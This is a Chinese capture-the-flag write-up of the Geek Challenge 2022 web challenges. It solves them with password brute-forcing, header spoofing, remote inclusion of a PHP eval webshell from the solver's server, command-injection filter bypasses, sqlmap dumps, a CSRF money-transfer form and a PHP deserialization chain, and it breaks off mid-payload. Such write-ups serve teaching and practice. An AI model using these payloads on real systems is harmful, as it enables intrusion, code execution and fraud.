0


[Geek Challenge 2022]Web部分 writeup by q1jun

0x01 题目:登入试试

GeekChallengeUser ~ % ./登录试试

=== challenge info ===
type: web
points: 50
description: http://121.5.62.30:38001/EasyTime/
hint: Syclover用户忘了他的密码,咋办哦,依稀记得密码为6位数字,以774开头,这次我们来爆爆他的密码,让他再也不犯相同的错了
=== challenge info ===
please input your flag:

解题思路

进入页面,输入用户名Syclover和密码774

打开Yakit代理抓包:

image-20221118140858118

很明显密码是经过前端md5加密过的。

md5(774)=4e0928de075538c593fbdabb0c5ef2c3

题目提示 密码为6位数字,以774开头

通过脚本生成字典:

import hashlib
payload ="774"for i inrange(1000):
    payload1 = payload+str("%03d"%i)# print(payload1)print(hashlib.md5(payload1.encode()).hexdigest())

复制到yakit中保存为payload,并保存:

image-20221118141320841

可以在Payload 管理中查看已保存的payload:

image-20221118141437646

右键劫持到的http数据包,发送到Web Fuzzer中进行爆破:

image-20221118141534558

选中需要爆破的密码Value,并右键,选择

插入模糊测试字典标签

image-20221118141629503

选择我们前面生成的Payload:

image-20221118141743949

随后可以在

Web Fuzzer

面板勾选高级设置调整Fuzz参数,然后发送数据包,

即可在右边的Responses处看到返回包:

image-20221118141842733

点击响应大小即可筛选出爆破成功的返回数据包并查看:

image-20221118142040448

flag:

SYC{xi_huan_4_l}

0x02 题目:来发个包

GeekChallengeUser ~ % ./来发个包

=== challenge info ===
type: web
points: 50
description: http://120.77.11.65:8101/
hint: vanzy写了个拿flag的接口,但是好像有东西忘记改了
=== challenge info ===

please input your flag:

解题思路

进入网站,查看源代码

image-20221118142710107

发现在

/flag.php

下发送POST请求包即可获得flag:

image-20221118142811998

flag:

SYC{:D_y0u_has_known_how_to_construct_a_requests_by_yourself}

0x03 题目:Can Can Need

GeekChallengeUser ~ % ./Can Can Need

=== challenge info ===
type: web
points: 50
description: http://1.14.92.115:4091/
hint: 签个到我就跑(
=== challenge info ===

please input your flag:

解题思路

签到题,打开 http://1.14.92.115:4091/ 发现提示:请从本地访问

显然这是考察HTTP协议的题,那就根据题目提示一步步走即可拿到flag,这里不过多赘述,直接上步骤:

image-20221118143222925

X-Forwarded-For: 127.0.0.1

好像不太行,就换个姿势用

Client-ip: 127.0.0.1

image-20221118143323607

继续根据提示修改HTTP数据包Headers,添加

Referer: sycsec.com

:

image-20221118143422865

修改User-Agent

image-20221118143449519

添加

From: [email protected]

image-20221118143516027

flag:

SYC{E3sy_Http_hhXD2333}

0x04 题目:L0veSyc

GeekChallengeUser ~ % ./L0veSyc

=== challenge info ===
type: web
points: 50
description: www.sycsec.com
hint: 欢迎来到极客大挑战2022 flag以SYC开头
=== challenge info ===

please input your flag:

解题思路

进入www.sycsec.com 打开F12即可获得FLAG

image-20221118143816852

flag:

SYC{We1c0me_t0_Geek_2022!}

0x05 题目:justphp

GeekChallengeUser ~ % ./justphp

=== challenge info ===
type: web
points: 150
description: http://124.71.215.231:11451
hint: Canzik学长爱睡觉,等他睡醒了就给你flag
=== challenge info ===

please input your flag:

解题思路

打开网址 http://124.71.215.231:11451 得到源码:

<?phperror_reporting(0);include_once("flag.php");highlight_file(__FILE__);$sleeptime=$_GET['SleepTime'];if(isset($sleeptime)){if(!is_numeric($sleeptime)){echo'时间是一个数字啊喂!';}elseif($sleeptime<86400*30){echo'这点时间哪够Canzik学长睡啊';}elseif($sleeptime>86400*60){echo'别让Canzik学长睡死在这啊!';}else{echo'<br/>Canzik学长很满足,表示这次把这辈子的觉都睡完啦!flag在这,自己拿吧:<br/>';sleep((int)$sleeptime);echo$flag;}}?>

这是一个sleep()绕过的题,原理是强制转换

0.??e

开头的科学计数法数字为

int

时会解析为

0

❯ php -r "echo var_dump(0.2e123);"
float(2.0E+122)
❯ php -r "echo var_dump((int)0.2e123);"
int(0)

86400 * 30 = 2592000

即 0.2592e7

所以payload如下:

image-20221118144413337

flag:

SYC{C@nzik#lik3s_to#sleeP_in_class?*#}

0x06 题目:jsfind

GeekChallengeUser ~ % ./jsfind

=== challenge info ===
type: web
points: 150
description:
hint: 游戏玩不了的话请使用chrome试试;你知道如何在js文件中找出敏感路径吗?
=== challenge info ===

解题思路

输入

yes

开启容器,进入后按F12找到flag.js的路径:

image-20221118144620682

//    "js/aaa/aaa/aaa/bbb/bbb/bbb/bbb/bbb/bbb/aaa/aaa/aaa/aaa/aaa/bbb/flag.js",

打开后得到:

//   flag = U1lDPX5bXTtTWUM9e19fXzorK1NZQywkJCQkOighW10rIiIpW1NZQ10sX18kOisrU1lDLCRfJF86KCFbXSsiIilbU1lDXSxfJF86KytTWUMsJF8kJDooe30rIiIpW1NZQ10sJCRfJDooU1lDW1NZQ10rIiIpW1NZQ10sXyQkOisrU1lDLCQkJF86KCEiIisiIilbU1lDXSwkX186KytTWUMsJF8kOisrU1lDLCQkX186KHt9KyIiKVtTWUNdLCQkXzorK1NZQywkJCQ6KytTWUMsJF9fXzorK1NZQywkX18kOisrU1lDfTtTWUMuJF89KFNZQy4kXz1TWUMrIiIpW1NZQy4kXyRdKyhTWUMuXyQ9U1lDLiRfW1NZQy5fXyRdKSsoU1lDLiQkPShTWUMuJCsiIilbU1lDLl9fJF0pKygoIVNZQykrIiIpW1NZQy5fJCRdKyhTWUMuX189U1lDLiRfW1NZQy4kJF9dKSsoU1lDLiQ9KCEiIisiIilbU1lDLl9fJF0pKyhTWUMuXz0oISIiKyIiKVtTWUMuXyRfXSkrU1lDLiRfW1NZQy4kXyRdK1NZQy5fXytTWUMuXyQrU1lDLiQ7U1lDLiQkPVNZQy4kKyghIiIrIiIpW1NZQy5fJCRdK1NZQy5fXytTWUMuXytTWUMuJCtTWUMuJCQ7U1lDLiQ9KFNZQy5fX18pW1NZQy4kX11bU1lDLiRfXTtTWUMuJChTWUMuJChTWUMuJCQrIlwiIitTWUMuJF8kXysoIVtdKyIiKVtTWUMuXyRfXStTWUMuJCQkXysiXFwiK1NZQy5fXyQrU1lDLiQkXytTWUMuXyRfK1NZQy5fXysiKCdcXCIrU1lDLl9fJCtTWUMuXyRfK1NZQy5fJCQrIlxcIitTWUMuX18kK1NZQy5fJCQrU1lDLl9fJCsiXFwiK1NZQy5fXyQrU1lDLl9fXytTWUMuXyQkKyJ7XFwiK1NZQy5fXyQrU1lDLl9fXytTWUMuJF9fKyJAXFwiK1NZQy5fXyQrU1lDLiQkJCtTWUMuX18kK1NZQy5fX18rU1lDLl8rIl9cXCIrU1lDLl9fJCtTWUMuX18kK1NZQy4kX18rIlxcIitTWUMuX18kK1NZQy4kXyQrU1lDLl9fJCsiXFwiK1NZQy5fXyQrU1lDLl9fJCtTWUMuXyQkKyJcXCIrU1lDLl9fJCtTWUMuX18kK1NZQy5fJCQrU1lDLiQkJF8rIl9cXCIrU1lDLl9fJCtTWUMuX19fK1NZQy4kX18rU1lDLl8kJCtTWUMuJCRfXytTWUMuXyQrU1lDLiQkXyQrU1lDLiQkJF8rIl9cXCIrU1lDLl9fJCtTWUMuX19fK1NZQy4kXyQrIlxcIitTWUMuX18kK1NZQy4kXyQrU1lDLiQkXysiXFwiK1NZQy5fXyQrU1lDLl9fXytTWUMuXyQkK1NZQy5fJCtTWUMuJCRfJCsiXFwiK1NZQy5fXyQrU1lDLl9fXytTWUMuJF8kKyJ9Jyk7IisiXCIiKSgpKSgpOw==

base64解码后得到:

❯ echo xxx |base64 -d
SYC=~[];SYC={___:++SYC,$$$$:(![]+"")[SYC],__$:++SYC,$_$_:(![]+"")[SYC],_$_:++SYC,$_$$:({}+"")[SYC],$$_$:(SYC[SYC]+"")[SYC],_$$:++SYC,$$$_:(!""+"")[SYC],$__:++SYC,$_$:++SYC,$$__:({}+"")[SYC],$$_:++SYC,$$$:++SYC,$___:++SYC,$__$:++SYC};SYC.$_=(SYC.$_=SYC+"")[SYC.$_$]+(SYC._$=SYC.$_[SYC.__$])+(SYC.$$=(SYC.$+"")[SYC.__$])+((!SYC)+"")[SYC._$$]+(SYC.__=SYC.$_[SYC.$$_])+(SYC.$=(!""+"")[SYC.__$])+(SYC._=(!""+"")[SYC._$_])+SYC.$_[SYC.$_$]+SYC.__+SYC._$+SYC.$;SYC.$$=SYC.$+(!""+"")[SYC._$$]+SYC.__+SYC._+SYC.$+SYC.$$;SYC.$=(SYC.___)[SYC.$_][SYC.$_];SYC.$(SYC.$(SYC.$$+"\""+SYC.$_$_+(![]+"")[SYC._$_]+SYC.$$$_+"\\"+SYC.__$+SYC.$$_+SYC._$_+SYC.__+"('\\"+SYC.__$+SYC._$_+SYC._$$+"\\"+SYC.__$+SYC._$$+SYC.__$+"\\"+SYC.__$+SYC.___+SYC._$$+"{\\"+SYC.__$+SYC.___+SYC.$__+"@\\"+SYC.__$+SYC.$$$+SYC.__$+SYC.___+SYC._+"_\\"+SYC.__$+SYC.__$+SYC.$__+"\\"+SYC.__$+SYC.$_$+SYC.__$+"\\"+SYC.__$+SYC.__$+SYC._$$+"\\"+SYC.__$+SYC.__$+SYC._$$+SYC.$$$_+"_\\"+SYC.__$+SYC.___+SYC.$__+SYC._$$+SYC.$$__+SYC._$+SYC.$$_$+SYC.$$$_+"_\\"+SYC.__$+SYC.___+SYC.$_$+"\\"+SYC.__$+SYC.$_$+SYC.$$_+"\\"+SYC.__$+SYC.___+SYC._$$+SYC._$+SYC.$$_$+"\\"+SYC.__$+SYC.___+SYC.$_$+"}');"+"\"")())();

这是一串js混淆代码,直接复制到浏览器Console执行:

image-20221118144949715

flag:

SYC{D@y0u_LiKKe_D3code_EnCodE}

0x07 题目:ezR_F_I

GeekChallengeUser ~ % ./ezR_F_I

=== challenge info ===
type: web
points: 150
description: http://121.5.62.30:7005/
hint: 想要得到flag就快来包含一下叭 可能你需要一台具有公网ip的服务器
=== challenge info ===

解题思路

进入地址:http://121.5.62.30:7005/

很明显这是远程包含漏洞,经过测试,过滤了

http://

可以双写绕过:

hthttp://tp://

然后把写好的一句话木马用公网ip的服务器进行远程包含即可

注意这里后缀会自动补上

.html

所以传进去的🐎必须是以

.html

为后缀的,比如这里使用的木马文件名为

shell.html

一句话木马:

shell.html

<?phpecho"hello";phpinfo();
    @eval($_POST['q1jun']);?>

最终payload:

hthttp://tp://你的公网ip/shell

image-20221118145757459

使用

AntSword

上马,拿到flag:

image-20221118150307185

flag:

SYC{Th1s_is_RFI_hahaha!}

0x08 题目:ezrce

GeekChallengeUser ~ % ./ezrce

=== challenge info ===
type: web
points: 150
description: http://121.5.62.30:7006/ 佛说:你没有女朋友
hint:
=== challenge info ===

解题思路

进入网址拿到源码:

<?phphighlight_file(__FILE__);/*佛又曰:输羯吉摩伽无婆羯尼羯驮萨夜南楞婆唵遮参怛烁阿怛度怛唎谨栗南提萨楞度摩谨伽伽墀醯咩驮夜帝俱佛悉呼数写帝尼嚧蒙舍利沙室罚陀俱悉夜喝唵尼孕南写利驮卢罚谨蒙伊谨尼卢利伽豆地皤穆罚驮醯伽无菩钵输烁呼驮数数嚧摩阇钵咩菩卢栗阇室栗罚俱室写耶穆墀摩利楞数皤哆呼无罚埵羯钵怛唎埵吉夜尼帝佛帝墀南吉孕室写南孕怛参阇呼怛伽迦地呼嚧咩参谨南他佛尼利栗数喝呼怛耶啰摩那羯喝萨啰俱婆楞孕孕穆呼哆输伽室利参迦苏摩伊嚧埵罚豆佛写那帝楞室墀度罚娑佛陀豆萨吉埵尼醯尼咩穆伽呼尼伊嚧呼阇娑摩苏驮苏地孕唵苏沙利无伽伊写提曳谨帝栗参啰迦俱菩罚呼遮埵无伽舍萨提遮他南栗醯啰罚曳咩伊娑咩楞咩豆墀钵皤度那沙栗菩夜苏迦迦摩婆萨输舍南沙啰输阇怛佛钵吉那埵南皤度啰孕遮烁沙蒙输他帝婆谨舍沙菩阿地阇遮阿埵输醯怛参栗无羯怛婆参舍无他羯悉遮吉孕羯哆蒙呼阇苏舍曳萨耶悉尼羯提娑谨遮婆罚罚苏婆数钵烁豆利室栗提陀他沙输悉罚唵埵摩迦啰参羯喝伊咩哆菩萨谨唎伊陀孕尼驮尼楞哆提栗悉诃参数嚧啰输罚咩尼罚唵迦沙穆穆无夜哆萨醯孕阇参羯佛耶南夜孕陀驮地醯舍尼驮萨提豆罚伽数阿耶呼栗写遮啰醯利萨嚧豆婆娑唵皤舍伊栗地沙阇婆喝利钵阇皤豆驮迦萨伊摩那唵迦穆羯萨驮娑摩那钵墀卢无陀埵谨哆醯穆醯度提室蒙夜伽悉提醯伊摩尼陀嚧写栗悉舍萨谨嚧提钵啰钵写啰萨墀曳唎埵参耶墀啰那喝迦遮嚧咩苏啰提咩卢耶埵阇楞孕喝怛羯嚧哆俱悉哆阇迦埵呼参舍沙蒙度穆夜皤尼诃无陀那沙沙蒙谨皤尼提诃穆悉罚啰输豆利尼阿栗喝皤豆喝咩咩嚧室曳醯楞墀利那参伽嚧钵输曳墀陀诃婆曳唎孕伽尼楞室谨蒙数唎迦醯帝摩提那谨俱摩婆罚南地他穆唵卢菩尼婆嚧醯写唎遮啰南无俱菩他孕娑怛栗他提卢菩数喝他帝俱诃罚无佛怛醯悉夜唵墀度摩咩帝舍孕豆他醯阿醯南摩沙哆室唎伊烁利驮咩参曳数吉沙钵怛羯伽穆嚧俱提诃罚参那南写数羯驮萨提孕数驮罚栗蒙墀谨驮羯度孕娑摩娑尼豆遮怛提尼陀烁呼喝婆萨沙伊迦羯曳佛遮卢遮尼苏谨啰栗室提参喝吉怛卢墀墀蒙摩利咩萨诃娑罚阿穆地舍尼蒙孕喝皤萨他嚧卢迦输地阿利曳楞喝哆曳喝醯沙诃南舍罚罚数提皤咩南悉伊喝栗摩诃输苏咩啰提吉尼无啰伊咩羯栗菩嚧室那那吉室伽写输南娑输耶墀舍沙无地迦无度提陀穆苏驮利蒙帝菩豆伽豆陀数穆伽度墀室孕卢提啰迦墀那呼俱吉唎地哆夜豆怛喝迦摩皤俱孕阿吉曳烁那阿哆俱输尼穆唎帝他卢烁曳他谨地皤卢地佛苏喝悉唵羯参曳尼啰楞驮沙输耶钵他菩那无曳吉遮罚喝舍输参卢豆伊摩耶曳迦曳夜娑唎墀蒙卢俱喝帝摩度曳曳伊喝他无钵伽吉室唎地唎咩埵舍唵孕尼尼嚧羯呼遮耶室迦墀娑钵驮提伊醯呼室写唎舍参陀南俱摩耶度耶烁写萨萨无伊陀吉墀罚孕利埵那利摩伽钵楞地伽迦喝利他输皤曳卢迦沙怛地写卢伊埵孕诃呼蒙埵输婆写阿唎蒙婆婆萨俱沙栗悉那蒙伽卢诃夜罚输无菩他参写迦诃穆萨他菩皤醯咩孕墀耶室驮钵唵摩埵墀利阇利伽墀埵楞婆喝写埵尼迦吉咩婆陀沙婆喝咩阇室楞豆皤俱楞迦室悉阇婆钵呼阿唎沙迦驮悉烁楞那陀娑楞菩钵埵喝室卢陀俱舍楞钵蒙夜穆帝菩喝地诃提地夜无他阿嚧夜漫

*/if(isset($_GET['ip'])&&$_GET['ip']){$ip=$_GET['ip'];if(preg_match("/ls|tee|head|wegt|nl|vi|vim|file|sh|dir|cat|more|less|tar|mv|cp|wegt|php|sort|echo|bash|curl|uniq|rev|\"|\'| |\/|<|>|\\|/i",$ip,$match)){die("hacker!");}else{system("ping -c 3 $ip");}}?>

看到一串

与佛论禅

编码

使用在线工具与佛论禅重制版—Takuron得到:

新佛曰:愍蜜吽寂聞劫殿塞念婆如菩亦亦隸耨修是如諸亦劫羅若尊喼所是迦諸波嘇莊隸叻兜波修迦空殿修阿迦空眾修殿嚴慧喃諸夷婆般羅嘇羅喃即僧叻薩色羅彌若隸殿愍隸斯陀嚤斯如莊嚤愍色尊彌嘚塞般闍隸羅殿夷塞殿陀祗缽諸哆哆諸殿陀缽如夷劫嘚殿彌缽婆嚤般祗嚩塞嚴咤降婆尊諸咤寂隸咒羅莊所波眾婆婆嚩耨菩殿薩陀降阿薩所寂訶迦諸耨宣喃嘇諸斯聞僧色如訶咒嚤嚴空波阿般耨劫般是缽吽菩喃薩須塞薩莊若闍喃眾如願殿吶波若婆宣塞宣如心摩殿所愍心訶喼隸即般心迦叻羅心隸蜜囉喃殿聞囉念嘚嚤陀菩若修嘚如若迦尊祗薩殿薩殿吶尊嘇闍婆吶殿即耨薩伏哆尊嚤塞咒隸嘇羅祗即殿闍降色殿波嘇心喼波兜兜阿伏吽隸空宣喃如諦嚤彌咤波是婆是降嚩寂殿須

再使用在线工具新约佛论禅/佛曰加密 - PcMoe! 得到:

我都懂,我都明白,我是没有策略的防火墙,是被无限绕过的WAF,是扫不出马的EDR,是丢流量的探针,是没升级的态势感知,我守不住内网,也守不住你。#flag或许会在当前目录#

得到提示:flag或许会在当前目录

ok,开始RCE

看到过滤了这么多指令,不要怕,可以使用

\

绕过,所以查看当前目录下的文件:

http://121.5.62.30:7006/?ip=;l\s
a.out error.log index.html index.html.1 index.html.2 index.html.3 index.html.4 index.php may_b3_y0u_can_pr0t3ct.php phpinfo.php

直接访问 may_b3_y0u_can_pr0t3ct.php

即可得到flag:

❯ curl http://121.5.62.30:7006/may_b3_y0u_can_pr0t3ct.php

flag:

SYC{y0u_n33d_a_g1rfr1nd}

0x09 题目:WelcomeSQL

GeekChallengeUser ~ % ./WelcomeSQL

=== challenge info ===
type: web
points: 150
description: http://120.77.11.65:8100/
hint: 你能找到admin的秘密吗?
=== challenge info ===

please input your flag:

解题思路

进入网址,F12查看源代码得到提示:

<!-- By the way, can you GET me your id? -->

GET请求id,猜测id为注入点。

然后sqlmap一把梭23333

❯ sqlmap -u "http://120.77.11.65:8100/?id=1"
sqlmap identified the following injection point(s) with a total of 75 HTTP(s) requests:
---
Parameter: id(GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2114=2114

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 5440 FROM (SELECT(SLEEP(5)))bcAD)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-7799 UNION ALL SELECT NULL,CONCAT(0x717a706a71,0x48746f415a4b414a67594743444e6549524972464854567a55744a5857794b744c796f6765766378,0x7178767671)-- -
---

得到注入类型为联合查询注入,下面为sqlmap基本操作,不加以赘述

❯ sqlmap -u "http://120.77.11.65:8100/?id=1" --dbs #查数据库名
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] WelcomeSQL
❯ sqlmap -u "http://120.77.11.65:8100/?id=1" -D WelcomeSQL --tables #查表名
Database: WelcomeSQL
[1 table]
+-----------+
| user_info |
+-----------+
❯ sqlmap -u "http://120.77.11.65:8100/?id=1" -D WelcomeSQL -T user_info --columns #查列名
Database: WelcomeSQL
Table: user_info
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
|id| int(11)|| secret   | varchar(256)|| username | varchar(256)|
+----------+--------------+
❯ sqlmap -u "http://120.77.11.65:8100/?id=1" -D WelcomeSQL -T user_info -C secret --dump #dump数据
Database: WelcomeSQL
Table: user_info
[5 entries]
+--------------------------------+
| secret                         |
+--------------------------------+
| an4erniuniu                    || myTh3mee33e                    || P_God                          || SYC{VV31c0me_T0_5QL1_vv01rd_!}|| vv33l1n                        |
+--------------------------------+

flag:

SYC{VV31c0me_T0_5QL1_vv01rd_!}

0x0a 题目:babyupload

GeekChallengeUser ~ % ./babyupload

=== challenge info ===
type: web
points: 150
description: http://121.5.62.30:7009/
hint: 简单的文件上传
=== challenge info ===

please input your flag:

解题思路

随便传个图片,在

Yakit

中将图片的数据全部删掉,换成一句话木马

由于通过前面的题目,我已经知道flag位于“/flag”,所以对传入的木马进行简化。

直接读取flag:

image-20221118161426099

得到flag:

image-20221118161451903

flag:

SYC{welc0me_t0_up10ad_wor1d!}

0x0b 题目:drinktea

GeekChallengeUser ~ % ./drinktea

=== challenge info ===
type: web
points: 250
description: http://mc.vveelin.com.cn:8102/
hint: an4er说想吃双皮奶,你能帮帮他吗?环境每隔30分钟重置;你知道f4tb3e在syc的B站号上分享了什么吗
=== challenge info ===

please input your flag:

解题思路

进入页面,注册一个账号,然后进入反馈页面,在源代码发现了一段php源码

<?php//真的随机吗?$seed=file_get_contents("/seed");mt_srand($seed);mt_rand();//   == 1567320364mt_rand();mt_rand();mt_rand();mt_rand();mt_rand();$code=md5(mt_rand());echofile_get_contents("random.php");?>

根据线索使用工具

php_mt_seed

爆破出种子:

image-20221120011252030

seed为666666

然后用以下脚本得到

$code
<?php//真的随机吗?$seed=666666;mt_srand($seed);mt_rand();mt_rand();mt_rand();mt_rand();mt_rand();mt_rand();$code=md5(mt_rand());echo$code;?>
$code = 2bfd7154e1f327a42dae866bac9ecd45

根据题目提示,这应该是提交反馈后利用CSRF获得VIP权限进行购买双皮奶。(后面发现还需要搞钱钱

在主页中得到提示:

<!-- 管理:mng.php -->

访问

mng.php

后得到

只有狮吼功继承人才能更改VIP权限,用法示例: ?name=f4tb3e&vip=true

所以构造以下csrf请求语句:

http://mc.vveelin.com.cn:8102/mng.php?name=q1jun&vip=true

过了一会发现自己变成VIP了。

image-20221120012611752

但是发现购买双皮奶需要999999999999元,那就继续CSRF操作。

先测试一下转账操作,用

yakit

抓包:

image-20221120012840203

发现是POST的CSRF操作…

构造CSRFpoc:

<html><body><script>history.pushState('','','/')</script><scriptlanguage=javascript>setTimeout("document.form1.submit()",20)</script><scriptlanguage=javascript>setTimeout("document.form1.submit()",1000)</script><script>var pform = document.getElementById("postform");
        pform.submit();</script><formid="postform"name="form1"action="http://mc.vveelin.com.cn:8102/trans.php"method="POST"><inputtype="hidden"name="username"value="q1jun"/><inputtype="hidden"name="money"value="999999999999"/><inputtype="submit"value="Submit request"/></form></body></html>

把这个上传到有公网IP的服务器,将URL在反馈中提交,过一会就会得到金额:

image-20221120015142958

然后下单一份双皮奶就可以得到flag了。

flag:

SYC{Dr1nk_V1P_t3a_4nd_3nj0y_C5RF}

0x0c 题目:easyphp

GeekChallengeUser ~ % ./easyphp

=== challenge info ===
type: web
points: 250
description:
hint: 你能看懂这串代码的意思吗
=== challenge info ===

解题思路

访问网站,摁F12得到hint:

<!-- hint: backup file -->
dirsearch

扫一下网址目录,得到备份文件

/index.php.bak

Target: http://qc1119ff-671b-11ed-bc58-165319f5738e.challenge.sycsec.com/

[16:30:37] Starting:
[16:30:51] 200 -    2KB - /index.php.bak

Task Completed

得到一段代码:

<?php$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0ianlIcUlZZHJNdVZ4a05RVWdlV2xidGFaUFJFRm9LSkNuQmh3RFhwQU9tZkdTaXZzY1RMenp3Y1h5a0VDbXNxTGdoUk5NWkpRYUd2ZldvRlVuU3RBeGpkVmlySXBiVHVPUEJEWWxlS0hXaTlWdmNwU2syTGRsM21NUlRRWWFjUXlmcnR3dko1eEVPOXNBeFlTeUFwTXlBcE15QWpWRUp0WXZKbU10T0Y3QU1uTXlBcE15QXBNeWNqMWtUTElrd2pURUo1ekVPUURhQmp1cjNFZHYycTFsQU1JQUJwTXlBcE15QXBNWlZuTXlBcE15QXBNeUFwTXlBcE15QXBNdGNvbnZybU1LZTRNa1BwOXlBdFRaY2RDeWNRREVQcEJiVm5NeUFwTXlBcE15YzBTQUJwTXlBcE15QXBNbGNxQmFPUXp5T2YxYVRoMHZKOXN5VTl1Zk9xSEVjdDFrM1JuU1JuTXlBcE15QXBNeWNZU3lBcE15QXBNeUFwTXlBcE15QXBNeU9xenZPOE10Y29udnJtTUtlNE1rUDRCcTI5M3l6WVN5QXBNeUFwTXlBajlBeDBTQVRoWWtyaEh5RnRkYTJFWWtKbzVaVm5NeUFwTXlBcE15Y2oxa1RMSWt3cGdrellTeUFwTXlBcE15QWpWRUp0WXZKbU10T203QU1uTXlBcE15QXBNeWNqMWtUTElrd2pURUo1ekVPUURhQmp1cjNvRE4zb3d2SjV4U0FnU3lBcE15QXBNeUFqN0FCcE15QXBNeUFwTXlBcE15QXBNeUFwZ0VPZElsd3BHV0JqQnlBMCt5T2RkbGNqNVNBbzB2T1FIeUEwK3lPbUliVm5NeUFwTXlBcE15YzBTdVJuU2syTGRsM21NcVRVc29PVXd2MmREYU8xUVpWbk15QXBNeUFwTXljajFrVExJa3dwZ2ZpWVNBQnBNeUFwTXlBcE1sY3FCYU9RenlPZjFhVGgwdko5c3lPZGRsY2o1U0FvemFKUklaVm5NeUFwTXlBcE15QXBNeUFwTXlBcE1mcmZkYUFNZ2syMWdTZVlTeUFwTXlBcE15QWo5QXgwU0FUUVRTT1FIbDJxMFNBb3VORjllcVVZeGwzb3d0MTBJU3JZU3lBcE15QXBNeUFqMWF4aFFsVFFkYU9RNmZQTWdyMWpXTjFvYXQzaDBsQkVFU2VZU3VSbj0iOyAgCiAgICAgICAgZXZhbCgnPz4nLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwgICAgCiAgICAgICAgJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7"));?>

在本地进行简单的逆向出这段php对应的源代码:

<?php$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};echo$O00OO0."\n";echo$O00O0O."\n";echo$O0OO00."\n";echo$OO0000."\n";echo$O00O0O."\n";// n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j// base64_decode// strtr// 52// base64_decode$O0O000="jyHqIYdrMuVxkNQUgeWlbtaZPREFoKJCnBhwDXpAOmfGSivscTLzzwcXykECmsqLghRNMZJQaGvfWoFUnStAxjdVirIpbTuOPBDYleKHWi9VvcpSk2Ldl3mMRTQYacQyfrtwvJ5xEO9sAxYSyApMyApMyAjVEJtYvJmMtOF7AMnMyApMyApMycj1kTLIkwjTEJ5zEOQDaBjur3Edv2q1lAMIABpMyApMyApMZVnMyApMyApMyApMyApMyApMtconvrmMKe4MkPp9yAtTZcdCycQDEPpBbVnMyApMyApMyc0SABpMyApMyApMlcqBaOQzyOf1aTh0vJ9syU9ufOqHEct1k3RnSRnMyApMyApMycYSyApMyApMyApMyApMyApMyOqzvO8MtconvrmMKe4MkP4Bq293yzYSyApMyApMyAj9Ax0SAThYkrhHyFtda2EYkJo5ZVnMyApMyApMycj1kTLIkwpgkzYSyApMyApMyAjVEJtYvJmMtOm7AMnMyApMyApMycj1kTLIkwjTEJ5zEOQDaBjur3oDN3owvJ5xSAgSyApMyApMyAj7ABpMyApMyApMyApMyApMyApgEOdIlwpGWBjByA0+yOddlcj5SAo0vOQHyA0+yOmIbVnMyApMyApMyc0SuRnSk2Ldl3mMqTUsoOUwv2dDaO1QZVnMyApMyApMycj1kTLIkwpgfiYSABpMyApMyApMlcqBaOQzyOf1aTh0vJ9syOddlcj5SAozaJRIZVnMyApMyApMyApMyApMyApMfrfdaAMgk21gSeYSyApMyApMyAj9Ax0SATQTSOQHl2q0SAouNF9eqUYxl3owt10ISrYSyApMyApMyAj1axhQlTQdaOQ6fPMgr1jWN1oat3h0lBEESeYSuRn=";echobase64_decode(strtr($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000)));?>

得到:

<?phpclassBillyHerrington{public$a;publicfunction__wakeup(){$this-> a ="fxxk you ";}publicfunction__destruct(){echo$this-> a."Wow";}}classBaoglady{public$b;public$c;publicfunction__toString(){$this-> b ->happy($this-> c);}}classVanDarkholme{public$d;publicfunctionhappy($cmd){eval($cmd);}}if(isset($_POST['str'])){unserialize($_POST['str']);}

可以看出这是一题反序列化,最终需要利用的类为

VanDarkholme

构造序列化代码进行利用:

<?phpclassBillyHerrington{public$a;publicfunction__construct(){$this->a=newBaoglady();}publicfunction__wakeup()#绕过wakeup CVE-2016-7124{$this->a="fxxk you ";}publicfunction__destruct(){echo$this->a."Wow";}}classBaoglady{public$b;public$c;publicfunction__construct(){$this->b=newVanDarkholme();$this->c="system('ls /');";}publicfunction__toString(){$this->b->happy($this->c);}}classVanDarkholme{public$d;publicfunctionhappy($cmd){eval($cmd);}}$payload=newBillyHerrington();echoserialize($payload);#O:15:"BillyHerrington":1:{s:1:"a";O:8:"Baoglady":2:{s:1:"b";O:12:"VanDarkholme":1:{s:1:"d";N;}s:1:"c";s:15:"system('ls /');";}}

根据CVE-2016-7124进行绕过

__wakeup

函数,所以payload应改为:

